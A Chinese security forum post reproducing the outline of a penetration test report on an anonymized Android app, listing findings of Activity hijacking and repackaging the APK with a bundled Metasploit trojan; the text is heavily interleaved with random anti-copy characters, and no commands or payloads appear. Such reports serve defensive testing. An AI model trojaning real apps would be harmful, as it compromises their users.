找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4780|回复: 0

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
发表于 2022-6-8 20:32:44 | 显示全部楼层 |阅读模式
6 i' c% [( [' I2 t; i6 C, X' k / I4 h" k1 U; _2 |

8 Q6 b v/ f! G7 j1 }8 _* w 3 Q/ H9 L( U, |# w5 T
& }- U5 X. k# p) W/ O7 y( N - |' I- A+ ~9 C/ W

- F' X/ E( I5 P$ \; b6 b# M: Q/ a( c4 ]# p' V
?( o# L/ w) ^, ? , E7 o+ C' t+ b/ C1 i$ X

$ i" A$ ?/ n( s" D, c5 _ * a& b% F) P8 [- B [3 k8 ~ 文档编号:                : b" [9 s/ d4 p F c- J& X $ C- g+ }' c2 L- T% \) a, U

) Y! @8 }" ^, V8 t7 v 8 ]2 F6 [7 m$ _% y

$ o9 `1 `0 O' d& R 9 `* f, {: L$ N- p4 l- \% p/ |   5 E. i6 T$ {5 A- D: C3 R ) |/ h2 K" I# z U: P o2 I/ C' ]

3 P) ^& t3 v1 r# R1 H7 | ' o+ v3 Q! ]! ~$ J5 p) n

# \, ]5 X" u: H }5 R! `. a: f; p   & A# ?8 S0 q0 ~3 [8 ~6 [/ H( T9 [5 r8 h7 Y5 q3 D

4 P# w$ ~7 t. i( S& J6 d5 X1 C) g: E7 M* v5 [ L B; @, A2 g& ?

' S$ \ S4 D. T4 { 0 I- l5 w+ u o0 n0 T   # E: @+ }2 ^: i6 |1 i+ s ' X+ G! q, j% s5 x. N: j

f9 Z4 d$ z" X7 m% }1 l! U$ U9 c7 t: I$ G' I% @- ~. I* K4 i

1 W0 B$ y) D6 e3 l" J) S" K $ G/ p6 K/ h8 @7 I# R   & x; [& x9 ]5 N) m @ 9 h+ G z, Z- M1 i9 ?8 A

9 y( e7 U" D- [+ S" [; _2 g/ T3 b4 [; r% X$ x6 u

) ^" @8 v" n3 f8 A! O 3 y+ X4 m6 ]8 Q7 `, l n# v+ x' p   9 c7 p2 h l4 s3 A9 U" A " r4 M: ^9 `' i# [ F( X; t

3 s. O0 H# C% S/ ]' H 6 c2 K5 i- q8 T- a

4 g y2 F* {& p+ \, K $ [9 K' j! Z" e- E; t 某某某APP渗透测试 , Y2 F4 }( ~& v/ R: w 6 Y$ g% l/ j. ~$ C& A: k9 N9 u

; M" }" S# o7 D : U! a' |1 h# n! M$ m4 W

( d5 ]% g+ K' v1 a1 ]2 L) ?8 [7 _ R; G   2 Q; Q# I* j! e% g4 K) s4 F. }6 e3 W 7 q4 I# j$ q4 L; b; E

: i: j7 @8 b% J% r* a $ b7 z8 [; \2 B5 n# r1 v" p

, z! l) W5 H# p s* p1 @$ o5 M A- _+ l+ h) [6 m- y! q. S   # d! {% G. \, p$ f8 }. j' p1 X ) l( P# R1 G* y Q8 p

- o! m9 ^$ e# @ / P5 l7 C9 n' C5 {0 S! I

' Z) a" p' C, ]( F0 |9 f0 y D4 Q8 q( o) y3 C v) e4 c   , R- U* d7 x- E1 P5 k $ V! k$ `) [+ {6 N4 R% K

1 x( k* C8 Q" d4 h3 {& w" r3 t: d # u) D# S g7 j

2 H) z# f& N5 p, v; k 8 k3 U1 k" F8 |, F$ Z4 @   9 k0 Z+ A! W) O5 v6 O8 N: _ , n+ B" u; ^$ h& U

, y% f$ Y) x/ s" B3 y: f/ r / I8 P+ G+ q* q: H0 d

: b% ]4 ^& L6 x- G7 N7 _7 f : P: f/ P3 s2 K+ U# V7 C 技 术 报 告 $ E( }, I2 v% \$ S+ J$ |" q . ]2 v/ i% h" @8 @$ Z6 {% L

: A$ c4 c# X. b& W1 `7 M; t6 K; e3 w; p! b1 v+ B: O

& t0 S" q/ i2 {' C# |# P! Y; I! w4 I* u   3 W, ?; D7 Z. l: s. K6 ] , s$ X6 |" b& q" P" e- c2 X

6 L4 G3 G7 b/ |8 u7 \$ t 5 H/ k2 T, D* K* g

' @5 L/ h: W8 c8 r% v 6 q# _7 j6 |5 z9 n, T5 {   4 k b4 F. [* J+ D9 a : h- x% B- S: u3 J8 K- W

1 l! V# `& a5 X; g% S! l" B$ O" A; T! q8 R8 B6 J4 [8 @5 A

+ h+ z. p- U& s1 Q0 j + N1 i# z8 W- D9 ?) T- d% B   t7 {6 X( G2 r7 q % y# s+ o% L4 e% \# t* Q; _

/ B9 M* C+ m5 N9 d: G9 k+ @1 p% L# g5 _* N" N

( b& m2 H* ]+ t2 m' O) v 1 s) v) _; y* G3 z   % [7 @) ]5 z* ?7 g5 a& K+ H( n- p9 ]7 k0 Y1 g; ~& o1 o K

" G$ c( j1 \# ?, F/ [; Y$ e" R5 ^4 ?

1 z0 o$ h) w! n; O3 E 3 V: T1 t& P9 g! z; k5 K+ v   # }! e5 B5 T7 O6 S 6 D j* a) _6 K' _: g7 i: Q

/ |1 [2 u# g$ V- ?7 ?: S. x5 { % w; S0 b1 f, \. `$ C( Q' s' {& F

" z3 _( @' A. s7 z# s. } z. y T& S3 V! ~' @0 \" q   |: o" C8 a3 e0 ?( R w3 P, B4 L/ T1 P, O" a

& {% U' z. B1 r) `0 L' K / Y. d. U+ v5 w F3 s

& n/ v" C! }- D t `) E' h; C- q" x) w" p/ r   * o, B$ S7 l5 o. \' A2 P : q. J0 H5 h# E5 O5 D

) s6 k" V! e: v7 m5 r7 F, A$ O/ E" T: d+ _! \7 ]

; c0 z; l: ?! t" t# H 2 j/ `# S7 |) U. W3 u$ c6 i   . |4 X/ ^( q: ~- g# o. C2 Q - H. a$ o# P. n+ \

; ^ H, C& H' K! f! n& i + `8 O) c4 Y; A! s

" r" d7 Q* J. b: {+ f7 Q* z % x- e! W! R" X5 F5 F! v/ v! w3 @3 Z   # u5 q1 d: z( p+ H1 C: { % `0 n9 ]' T! z. l+ U( g. J

3 p" h4 A0 o2 t5 B+ L4 F% y* U( H7 `

( y- r/ U B$ o3 G! w% X 5 l8 l" E( q( j) i+ M   $ c# ?5 n% s) I8 i* b0 e : f( q% J/ j2 O9 `) e+ G; f

& G7 S, ?! R! P # V: s8 u, [' F) l) ^ _$ Q$ M1 h

Z. B9 |1 |0 v9 o, O 2 w8 d' T* F1 K3 a+ C x/ q) }   * |; @$ _/ P8 d) P' S9 h9 X0 ]7 ^ ( _+ Q T5 u6 _

0 J1 ]( x# B: k1 T- f( c7 n: v6 K # \5 o; D* r' b: |" [& ~5 u: ~

6 \' X+ r: q- I" E8 A; ~( Y. g* [1 u0 ?. V   ' y' R/ M+ z& n/ `0 w( F4 U1 i2 d6 M" W) ]! I; B- r3 |

$ `& k+ e$ u5 u0 P! T$ a / d8 I; ?4 ~ J, X; E

1 s2 `9 V0 ?+ f7 J5 d 3 ^$ L; [" K* B c# e   ) Q+ a Q6 u4 _ % x% L3 h$ A6 B+ I' U$ K

' p2 p* X' F" H4 w/ l ( Q8 I! o5 u2 B$ [+ F2 l

4 _4 a# p3 Y2 k , A3 V( @; |! Q   2 \4 W5 a1 M0 C- h r9 x' f # U7 `6 V+ s7 E ~ p

0 w, q5 N# W# I- h/ \ - f' N* P! V1 S0 @

Y; @3 @' k8 ]3 D! m ! g# w- A) D! i' y0 j8 ]   ^, S+ T$ \/ D / c0 L: {0 X1 n1 X/ P

; _: M, ?. _: I5 S; a( R0 T2 ?1 r; \6 _/ l8 j7 j/ G8 X, l8 y3 M2 {

" V8 z j& k# z 9 g) j9 s0 e2 d6 ^$ X   3 n6 c2 m' z; |- a 4 J% p, U9 W3 h, ?4 f& A) |

. z0 y/ a$ T" C. o$ u' K 2 f* g; w+ M7 E

$ V& B8 ^) a! X: M ; [- r0 g- s B: S% c6 D& L   . G7 s. n( p( K/ Z7 A0 X : N- |! k E' l

8 M1 a, ?4 r; H! F1 y( A4 q1 c+ _% [' Y. z$ _8 x$ c% }

2 h- p B# y0 n- \: Y 5 X, z! o# h) w+ l. C   ( o- W: G3 j6 x% Y7 K5 h$ L, f Y+ T! ~- X. E# l

' v2 W" _2 _2 R" Z9 F+ j$ j/ L& i7 Y: Z6 y Q, V- \8 m

# J" L* {, n& S3 w6 O3 g1 }) w O : b2 j- l2 P5 i% k 二〇二〇年 1 q! A ~9 K! i( W5 r, o; K ! t7 }4 P: ]2 x, o* w

% f+ i# R: X; ~! X* D6 ~ - {! b2 J5 a# G' V% n( I3 B+ x
: N3 D+ D7 |7 p/ @! Q, ^" r0 t4 w, w. o( N4 x9 w) @
; } O' _- V! Q% b$ \7 A, \ ]$ L : i5 k( g, d+ h6 X' ]: ?, p4 N- y
/ x2 Y5 H, T& b) E1 O/ a8 u R, D % u+ S" v5 H' Z) {. F& m7 O& q
* {0 \1 A$ u, a( d7 r 4 w: A) p& p! w C5 e: T
: M5 H$ B5 D$ g# U ]5 M0 M3 I7 e9 m4 P* M: p& J( o$ ?
, T/ f9 M" ~; V# v2 B$ {( E" y+ \! n B) j$ k: a/ M% w
, J2 V, h# u" I2 _ ( T# ]. b9 B$ G0 @; B$ o. a
" T. {8 W( C8 f9 s7 _: D/ P! d! M) L. g3 @! {1 Z; v! n

" g( O0 Q* v0 N A4 T- y% g0 B% p, s/ r2 }/ K) a7 j 目 录 ' u" \2 r' v! g) @) n$ k. G x& Q 0 Y% ^$ t4 j0 n; U

) h; |% _5 @# U$ H! l. U0 f0 {; ] 0 f3 Z* c1 p2 h& q# W9 n/ K b4 F. T' z/ q" K5 z& V5 H& Q 0 h$ z& y9 @3 E

1 i: I/ ~$ Y& q# Q8 r' V x 7 W& k2 j0 z# A6 L; A   $ A! C: r: s5 @2 @ ; k% A/ I9 b2 i b( W4 h

7 W' {- C0 _! ]8 X- P7 y8 |3 T: c E. E( q: I

( j6 k/ `" z# O; u& Y" y* R- p ' u' F+ C8 L/ T' U- M* h/ e 1 概述... 3 & b' n) O: w+ [8 ]/ j! \0 h( r* z( P3 p; O, {

6 ~7 m7 c5 C0 b" E3 J/ l, F3 O! I 8 M9 c& s7 S8 C0 Y7 S& F

. H/ ]8 ~8 u. h ( w9 c# T' M, ]( w3 C* A! f 1.2测试时间... 3 $ n/ H6 e; T. p$ P1 N7 L J; J: i1 _# X }$ Y$ o/ G

+ j" a0 e6 p) \1 r8 } 9 K$ \, `. `! G

( d+ U' H3 ~# K3 Z* T3 F / S0 f3 [; d* {' ]: v' q9 w, Q 1.3测试对象... 3 3 n) h/ I" F6 E: S- M) [ 8 E: Y0 R! `4 U H

2 a" a3 e3 P( T! V! v7 [ 4 g% I! Y( g; r

' f# Q( {6 [' _: o " k# F1 h& R1 V$ e& l8 w; d 1.4测试结果... 3 x9 Y6 S) C5 V5 ?6 m0 T* P4 W4 ^ , ]1 q9 ]' U) F7 }* h/ {1 {

% S* Z. |$ L) C" ]: T# L & V2 F; }( q% _/ q$ s: m

- D* J3 C+ u+ F3 l4 A9 g$ f4 V1 ^1 H4 W; Q) D 2 检测结果... 4 0 } A8 Z! y* m m0 n$ W$ c1 f& }$ u

8 P2 E X- G7 ?9 f0 U' F 0 B5 V; G i3 f U

1 P8 X4 d& v; R" L( q5 ]# \" K 7 k! a! S9 L6 K& [4 Q9 N# J 2.1 某某某... 4 . }" z" P& b' x' M1 {. h3 @; }* B t* {. z7 n3 N: e8 R- T

% _3 W( {) ~* W& @. u7 q) E4 W Z4 S y& o3 K$ v# \

- v( k5 G+ n1 a" B 3 D/ ^ ?0 U+ @7 H! M' M& A 2.1.1检测目标... 4 ( S' S! Y1 M: M; K/ K1 }$ d7 y0 b$ z2 D/ {/ l. U+ u

; z' y& S, V5 N. n1 L& E0 B( a : Y" O+ I3 m! x z" I V% ]

$ ~+ Q6 t6 ~9 k. q I. s 5 I1 d8 f- U. ~9 Q* e 2.1.2检测结果... 4 7 i8 t; q7 Y& E ( h1 z# }$ n% x6 B" t7 D( y% Q

- ^" b# R. c* _- K- w1 l( k ) m% R: T0 B: r/ L2 b) ?

+ a. R# [0 ^+ ]* C% _3 {7 Q* t: i4 G; b2 d8 ] 2.1.2.1. 4 T$ } w! ]2 U0 |3 b: i/ O9 l2 y/ }8 L& z, {4 W# R2 Z/ p

: n V J9 j' K' _* [4 T: B; a1 h" o3 S6 d2 @$ H

) y) W5 _2 C( h' P/ k. e, D+ z& e! c# b8 l6 h9 q 2.1.2.2. 6 & c! z6 H" e% z. u2 D! l i5 [2 r - k" b$ Y4 N/ h2 b- z- o' y% z

; h( f5 `7 o8 F % b" X, |( ~9 J

6 V9 [8 c# R8 ]9 \( k - q% t1 c: A3 F 4 Y4 [( T, p6 Z6 ^" ^ E$ D 8 d; \ J- K2 r+ s

, ?5 M6 z+ b$ z$ g 3 \" L: G: e( Z* ^
5 i) A9 f7 g; o9 B) z3 }) Z( I2 W- Q+ }6 x& C
6 L5 b, u% r9 ^3 e% w( }9 W( W" [5 T
% W5 @) G z! q3 p( g6 s! k% n( \- o/ x2 Q5 S, H
4 r* V5 W' a) ~$ v5 Y- ?6 B, M7 I" B8 n2 H

# h) W0 v* u* Q" F8 J( ^- Y; d% P' ^ - Z6 g' t. E+ k2 \9 I, x- o4 r 1 概述 , D6 m x! K) F/ m/ A, @4 q& F ; s, k9 T' F1 E7 d$ X0 R/ e. P$ o8 J

2 n3 u, Z$ i7 u2 r, ~ * x; `1 ^, [* q6 D" t0 l

7 e8 i/ O7 n- H% o/ X7 Z1 O) b ; K& ?& w5 ?+ r8 s- p: b 1.2测试时间 , E( \7 P) i& `5 k$ V2 Y+ a& a : C# {6 ^4 m+ _; l: n+ y0 V9 H* s6 m) `

" L0 N8 F: I, l2 C6 S # K/ U4 ?, i- \7 l/ k $ w; H7 R0 W& S" p; a3 m8 H4 r2 o% d# J7 r2 u9 q$ q$ F+ `6 t9 z: \: n3 J" {1 Y+ O4 t" j0 R; l& a; k; _& M9 b! Z9 S% m# D+ a# o8 R# a1 N8 d- O4 }( e! P8 ~8 r" ^8 _9 s4 c$ e- M& S9 g$ }" M( Z5 Z0 I) j- y4 r) G& ?) ~% C" x$ U+ q* e/ l/ O4 Y/ a/ w) o B5 n% K0 R* o, B8 ?4 `: `& L3 \" d5 Z) k' Z2 Q! D: A0 g$ @% C& L, n5 z0 e, W3 E M8 ^0 s" c8 h: b5 @1 D6 N9 F8 f4 Q* h0 _8 p0 P1 Z K; Y9 h# ^0 m1 |9 f; y9 C1 H9 ?& ?4 g5 W1 s* i/ y: b6 x4 Z* b: M [$ E9 [0 P* S7 k9 j& l" k, a$ x0 v. [: \9 D5 H: e5 q6 R8 X+ a6 s. w0 J* y# s$ P& S" M y# T9 i9 }. W9 e" a) [5 I; y" L& X- @6 i2 I, S; T/ b2 U" Z* K( s# U/ b2 R7 j" J$ o! V( x$ h& v) _9 g) f7 Z1 p/ Q1 m" N8 O/ [6 G8 r, Y9 w/ H
/ H5 T( W0 k! y9 s. x 9 j0 W+ I2 C2 Z

$ x; x' I) b: d$ `8 A + N( ~$ B) f- M- \/ @8 G; f 渗透测试时间 1 f S% N- F) w% @+ v3 ^ B6 N. F2 V' B0 @) B

( {+ `- h, Y$ P: b- D: I5 @$ l4 X: h/ ~- O( B% Y
4 b c& F, Q/ X% M; N2 Q. i5 B# P: f2 c/ n- A- U3 y7 F. x- V( o

# H* K4 F; S" k/ S9 ~( R; d 8 E0 i" p7 C0 F3 ` 起始时间 ! q/ |5 ]* a B , d2 m9 }/ p% |$ b3 s/ S7 C ^; V

: @5 e# J$ K! W _. ^ ]9 G5 z. T$ c& y
- m# F4 g# q) y U 8 A# V1 L9 v1 K% N6 D. U' M) i

) |+ ~* f0 J8 ?9 x8 Y 2 Q% M. j% s. N7 Y 202046 3 q) V0 @0 K* W# }* Y7 J0 A & q! a% r% E- m# O* D: S* A: N u

+ D0 t4 Z1 d2 \4 v- e5 z o" | h( J5 V& |6 Q% O
9 s) k# _3 E% H# ] $ x/ x! N# {7 p( X2 Q3 [9 O

, x) Z& z# e4 x4 x4 G0 s+ K * K4 y- v5 u/ q! B n# e 结束时间 9 ?4 G# ^- a6 N- ?# K ' q9 b$ j4 M% B* F/ q

5 W! y* m. C! h* q4 B+ { + I* i$ P- m6 r* O+ n
8 I5 P8 K4 C: z$ e9 i# w " [, |- ]9 Y- ~& ?# R% z& J# t

! f" m( z# e, z5 A$ A- a5 H ' _7 K, @. }! j 202049 8 k* I% I9 H2 _2 D- U ' _: t" _" z9 V& [4 o

" q& B5 ?) ^ V7 Y$ s' J- ?! g& J9 J7 G! K5 `7 X; R1 @7 p
% o7 [: C2 @, _0 V 5 E5 V/ T; _- d- M! F

( \% ?. G. N0 c; I. u3 J 1 [/ H. _) N+ Z& x 1.3测试对象 8 z' \( D7 N2 g; S + C. W, j3 Y4 z+ ?

0 q2 g0 i$ N/ z& R1 Z" Z/ Q ^4 }

& ^3 _) y% N( C' S6 u: q ! x% _1 J9 T& c" V' ^" f6 C5 |9 r9 q 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: / @ S% o! o: r+ j* f( v # o0 Z$ X! ~, b; g" \5 g* z5 g

( f! a) d: U- ~- j; p- D6 s # T) p. q. n6 |6 ]

0 \- B8 y/ h8 W! B2 t) b" q : s4 g* i3 Q H/ `4 _- k. X+ @" T 1-1 检测对象 , T: J! h7 c% |+ s; @3 b: w+ \0 L0 H

7 X/ e) }# f9 d A& M + l7 e9 d, J9 @ + D8 H4 W( _7 C1 R6 P$ m4 n9 j7 @# Q% v" v: z! W% ^% l2 S+ m4 p' ], V2 x0 P$ z }, L4 j( x5 @. y6 t; ~1 H% B8 u! E, U6 b$ K0 p4 X: N5 ~' {6 q5 L) P7 ~, J5 A2 {3 \ _$ H) i' ?' w, ]# g& o% N/ f0 f! X! E" h: s. f$ X% c3 P( ^2 j4 c/ c! ^$ I- \* N5 g5 m# u% ~9 Z3 v9 a. S+ |. `) r" `4 P6 D. l' T4 P5 z" R3 K* J# b; F! [. {. ?, u. \( x' x. [2 b' y8 q" E' i. |5 A* F9 `' J* ~+ ^' h b, d, L, x0 |% b( R2 T& s& I# l5 {& K. q( {: j2 s9 s, P- j) m* S( q4 L' v3 H ~4 @% L- m2 w# t2 g# O5 S' {5 h. f0 K/ g1 B7 _: K/ H4 q% M6 x4 g; I& |, J' H3 m7 C: `2 ]# O) _! k o* O3 g, w% M$ B8 B# a& O. d1 E7 G P9 P6 J6 I8 _0 m0 V3 Q- t1 O. r- l6 `) B) T6 C' x3 D8 ]1 F C ^3 @2 M& \$ W1 s% s" e$ {. \! h9 G# m" v3 Q4 K/ i! v9 O( N/ g# o4 ^2 r( M6 r) S2 b0 z( e) ]
5 ~4 {- O/ p* a1 m7 H" e9 S0 Q/ d

0 n6 ]- P* C1 M& ]( P0 ]2 Z0 R2 A0 [, g1 U 序号 2 Y E2 Z# x9 f. A+ g! H& q" I 4 l4 i7 I5 ~1 M0 q

) N# n. c' r) [, _. H6 f0 c7 v, e1 ^& W/ c6 Q
) H5 n( Z# y1 }7 R/ P* v3 p: F9 M: p$ a; h5 r

9 | y& e/ ?! s8 R8 ] . _. P6 p+ V4 d1 p& y 测试对象 D! P' M( W$ { Y% a! C5 L$ y, U+ c1 L( g( C( A& a7 }

7 O3 c+ r% ?/ ^& j% ` " ?. j( W+ D7 p$ X. m1 R2 b
, l6 I3 C- m. q1 r* L' D- D8 N 5 L1 c2 N# l$ r8 K, Q2 z

; s" b$ f1 |1 p( K6 _# n5 | 4 [# U+ H, [( t0 s7 V5 F 测试地址 & X( w1 Q D" y, G2 D0 w6 F 9 o0 h$ \ _% O, ]7 {3 W& n4 r

. K( ~4 l( y) z i2 k( ? ' b1 ?" O% z L+ }! i
; L6 u; ^$ f/ M: C1 Q" |' [* `# v " ?5 x8 m+ u0 Q5 o; o

; ^3 K% T, P3 r9 c; O9 C+ u( y) E+ [ ; ~9 _- Z4 l! r; y7 C 安全漏洞 4 b0 t5 ~; \3 Y* r2 s3 K7 b , ]6 X$ [6 A' ~) _* Y* ?" G

: T0 Z7 \ C; t+ t( g, ^7 T5 G % r. X% l! e1 d8 a' m2 c
: `, [. [$ B/ k! C 1 Y1 t I l; L* X, |' s5 H9 p5 D

' Q- @' p# r+ J$ O, m0 d * h7 I( c9 h' `4 a0 Z$ B 1 " E" @& y8 n" R1 n3 f- ], ^ X. e: {( Y1 W2 y

e+ {- w- b0 m' M S7 c9 B* h4 k5 p( J" }) ]) ?# P3 p
# ?# Y& d7 c7 @6 j# Z& g1 A5 A, j( s$ \+ e9 n9 e. c8 N

: q2 o! b- Q: s& m2 ]8 i ; S$ n: O! g: a0 Z2 P 某某某安卓APP 3 j: w# |" | m {4 I' ?; v& g# d' J; e) n

' _( i: c4 [. H3 r7 Q# x+ z3 l) P % j3 u3 \) W% V
& |- Q5 k n, ^$ E 3 W+ N4 V1 R. y. z; ~+ v: l

" k4 O( T" G: T8 C5 V( Y# b# X( D : D0 n5 J( |) ~2 Y% y) ?+ v% ~   , m2 r' {8 h; W/ t3 Y$ A8 D7 S. \6 G$ |% d4 r' [5 a

# t, C! q# {2 p0 G+ ~$ ~) ~+ d; ?8 X8 x9 M C6 ~7 ]
% X- q' m, }) g! Q4 N! `3 m' C* K7 I; N, T) `+ K

3 P0 R- B4 P6 K$ y/ X$ T g% S 1 T5 G5 t/ i% X1 N4 L' U 2 - O( n& o! F% t& F( n/ ]; N3 M5 n9 d/ O; p

! N: D; C. [, b* P8 W 7 I' E8 e5 [! b: I9 h6 R! Q8 w# ^
& K1 e2 w4 x! U) W ) d" f9 e2 ^3 S3 E) B1 c; K0 _

+ R) ~6 J) ?. S5 P2 N/ u# l : e7 M' z1 x# o! X 1.4测试结果 0 k8 Q4 a2 b1 X3 L6 `! h ! x7 F$ W! J9 m2 a

/ t6 v+ X& K% U& Y: e/ K* }. V9 ?" c( B

( u& |* f4 o- @, w9 Q , D, Z# A# S- c' ]6 h 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # @5 j& O) [! i" b) M, z * q! F. [" |& l* J7 X( B! Z! ?

8 e. l' N2 U/ P- L& j. [ * {; |! |" Q, q P2 f& V

1 B( \7 E3 Y) a: O % j2 X7 f/ c# j. c M8 C& m   3 R& w6 X# ]! W' v( g9 U$ X9 I* c 1 S. I( w" t' ~% [2 _

% \2 ]1 O/ A2 y! ^# g0 x+ T7 D* ?" p3 o* Q3 \
- A9 F4 K7 b4 \/ M* I6 ~6 N5 B" t 9 o% ~8 F: r* u6 G# H4 U- e 9 ^9 w+ F; e n$ A! B2 U, S3 j: A; H/ G( \( ]7 A$ O% }, _ y0 x2 y# `, d4 d: Z; i+ b* F* Q- i( l# {4 O, t( C' e S2 H i. p5 i; X8 r2 W) S1 a7 R) T. H& t/ x# `3 ]3 H' I5 ^: g' \- }) ]0 {5 E. v7 T4 ?9 K" ]8 r% G( a; V, f$ }4 X! m4 R5 C" L- q; i0 A" R1 T/ f% U; w- ^! e* E6 v, |% e, a/ `' ]1 W6 k9 ^; U( I1 \2 j( u( V: y+ k( \, y" `) u2 ~- K# l/ S; A8 l D3 R; V g# h+ d" u8 D1 R1 F, Z: h! x2 K2 i& @9 X8 G( D0 D! U z8 d5 u' C4 i; ]9 X/ I* e( `% E! r- ^8 I O6 V1 q+ f, j$ [' @% E' x9 c( ^3 [! D* U0 |2 y+ n; \& p% k" u4 v m& r5 C5 n+ Y; C" L3 r( _! w2 }; L4 [+ ^ k( o) k; u6 U, u( ?5 g8 ^: M: N( G, K2 n# j3 s$ z. R9 ^- w9 v# C& V$ `) U4 C. n0 s- C2 Q0 I- S- @4 L' C: B4 ?) p3 W8 ^0 y0 R- M* \: d, A! ^# l3 q/ U$ l' `# D9 A$ \ G ?. j' _: m. E1 K8 g8 K2 F# V3 e% R; o9 I! v) O1 {8 P- \* I. G' K5 e8 U: @$ V( l! Y" E: ]8 Q4 x( T5 p9 K: v0 m/ F/ C$ R- K8 u* _' c( l! ~' `' k y+ M* c! y7 y" A! _. s9 U% a" v: f. ]3 C% I* Z) K+ T: ?) | t A' L5 [$ R+ w8 E1 C4 ]( K: r2 w; ~ E' j- E3 W- P8 G$ X! T" d8 y" N6 ]/ L h* H1 u, C' X `- b. y' o) b0 v# d/ g. W* b- f+ }# S( o T% ^4 R7 x3 t8 K, B$ Q; s) V* P) r" w+ u! |. A! J, _0 j
& m6 L- P3 n" _3 ~- t- \5 S1 r! @& F 8 p& E& V6 V' N! z& B# `

$ ?/ y1 b* j2 @; {7 ]0 x) U7 X; B9 X n( D 序号 ) V5 R+ l2 Z" E9 E1 F1 D. i m ( |7 Z% ~, w4 q

/ q4 v, R q' Q2 N, n B+ H" j% k( R+ {
. K( V' i/ r5 n3 R m 8 I/ q. w" F4 ^1 `

+ m! D x' D9 o7 n ( _0 q; T- R8 K$ h 系统名称 - l3 f0 Y, ]4 i' O% S5 I # i9 L/ y6 q; P4 F7 y

7 Y$ F' E+ j% ^3 x2 w& z' `* p 5 f w% k; H) d0 b9 y1 T. M+ E
; X3 f7 I" {1 Q* M 8 U2 s8 _& M0 s$ I% R

" u; }. K% ~3 |2 s8 `1 g0 p; v0 A- E7 K& d# p 漏洞名称 2 `( B% R" `; G7 X; | * Z) ]+ _5 {- P Z4 {! [) N

1 T# S# x+ _1 b6 W: i, m, ~" N# j5 {* G& A G; A7 X
# i( Y, P% Q% b) q$ ~( v/ E8 M B9 Z( t2 \- M7 g- H5 J! b

9 [4 D) [8 D5 k' [: [ 3 s: H. \4 W$ J1 p9 ~" n# S+ L 漏洞危害 ) W) Z+ v* _& Y/ Z& h E/ N " v& d- ] j; l% C* I

1 b9 H2 M7 u( T, u 3 j" ~9 @+ r7 W' ]& Q8 f& Y+ H4 m
9 n7 a" o7 H0 {2 P. [ 4 v' Q+ ]4 G0 N8 ^. c( G. u2 x

6 l# m# a, I( [1 F4 u * w3 L& \2 }& o6 \0 F" \. M! m* k) X 修复结果 % e( C7 c( _7 p3 `1 S: U {+ I0 {$ w2 T% T, x5 a

. Q9 M) H, m% h: [4 w1 ?3 m ' D( j2 j0 \% }% ^+ `
. _; s# ?7 ]$ t j 3 d/ V1 }) d/ P" z) f6 _: l

1 O/ G9 u. z9 |+ y0 j( E4 t ) P3 K! u' q1 n( J! F: n6 D2 S 1 & T) N; {9 h0 p# I 1 w, f! o) H6 E( z' ]

. l; O* |3 ?' D" P s 8 Y" S2 T1 I. \& w" I: N
8 ~( y" v7 W. j. w! c% U$ s* {: D* { 4 ^0 ]- a* ?+ `" C. l

4 @* u. r. M3 L" s " m1 A& L. ^4 S+ @ 某某某某某某APP 9 H" G. J9 z" C$ i8 z, ]9 a8 H0 }

$ U! c* v9 }. A4 C8 ?! @ 6 y5 y; r1 O7 Q( \& Q' I+ ]4 U+ O
3 J7 \1 m+ V! A; H- O! V# Y5 y & M4 \& b+ [0 y! |4 ^, N8 L

1 `# H* i. i& Z. A J9 ^. s . o( f2 H4 l) b4 j5 N) ^ Activity 劫持 + l" M. ~! D2 j6 s6 }; G # h; C' c7 O" x+ Q; Q

0 S+ B- \" n/ [( q" N , R1 w+ Y+ N; @: i3 I

. l7 h% D( Y7 z' q- R1 O6 A4 I * n; l# q }, _. ^2 W5 J0 n   ; g; Q, J$ r6 e3 `) G & R5 Z" I' ~5 l! T6 t. [

: W7 [. F: x# F) Y) ? 5 h- n! d5 L9 Q9 s- g, i1 I( c5 y
9 R/ { m5 \" g& F e& N; k6 D# [7 {3 o5 y* m' j. A; U

. l [& ]9 X9 G : B4 m+ m( J6 n" N& H" F + ^' r8 x6 V7 d2 E: P3 x; H z: l6 M8 ^5 j7 ~! W& D" b/ j

! ]0 s, Y/ N+ I+ p1 } 6 Y5 g# p+ T. t" S
: I2 E1 ^/ F) z7 k9 U# b; W/ x5 [5 A5 O3 u5 Q) B. }; N

- b5 C& C, l6 R+ K8 t ( p5 {# @6 n0 k$ a* h" G   - \* U/ b, P7 R) t. C, _4 u( ~9 z: ?3 \! U

% j' @' ?* [& V . O% O" A) ~& m+ K! l8 ]
3 k: \" b8 K0 r' n& w/ K% I 1 S7 W' o9 e( y

# e* S+ C" F5 T6 |' k 3 k2 B0 U$ ]0 `& j 2 # c2 s# v3 A6 u! S& Z& c # ~! a" g& ?; [8 k) U9 N4 ]# e

+ O e: e, |# H+ Z; F- q 2 e9 W# B( z- S. K
- h- V9 A6 m* L: t1 N0 q( [: y& [ " \4 [" M* {" ]% W5 R4 \

1 [* x* Y6 n1 _9 f" z$ e5 D9 q/ _ ' X, b! q$ g1 p) N4 C* e 某某某某某某APP {1 `8 y; N" J. a! h; Z 2 K) d4 |2 U9 o/ Y

! _3 }8 a; [- t; f- {, W4 i1 g2 t* ] `5 W6 W- E: I
4 f- z* M* ?/ Y- b9 [3 p: W& ] / a! f8 N# Q% M% D0 h

4 ?: g- f# q- A6 R- c, { 7 a6 Y/ i- \$ r" ^. M 反编译二次打包捆绑木马、篡改APP代码 8 m9 U3 d( ~) p$ j, W9 j$ V & j$ W* S1 H3 M, A3 i+ B z

+ g% c! k( A7 Q% _; t9 I 0 q; D# H- E4 {7 `. d2 K
) r( O J' V3 e0 A( {- l * o4 H* q" N! g& p

) M: O) q ]' v" k7 s 3 B; J" k+ }8 `/ @; p6 b( h - ~- Z+ ?% b+ { 8 ?6 Z8 i. M# b1 N. M; J; F

8 A1 L& f: T+ X3 m' l) b" V2 T6 O ; B' Q( Q j/ T1 p
$ o6 S5 _5 o4 c" E \" o$ g/ n( E D

& ^7 Y( {9 a0 T) {+ S# Q7 }) W- w N ( o0 }; u* f- Z# M8 b   - t; U U4 h8 r8 _/ X5 k2 v B4 W, B2 T! h

7 W1 S+ U; B1 G1 a% J / S2 D8 m. M! M& y6 s( z
2 P( A8 M9 ? L* L1 D: v4 ^# j: c8 [ , Z9 q4 W4 L! _' L- P, e2 n! r& X$ n
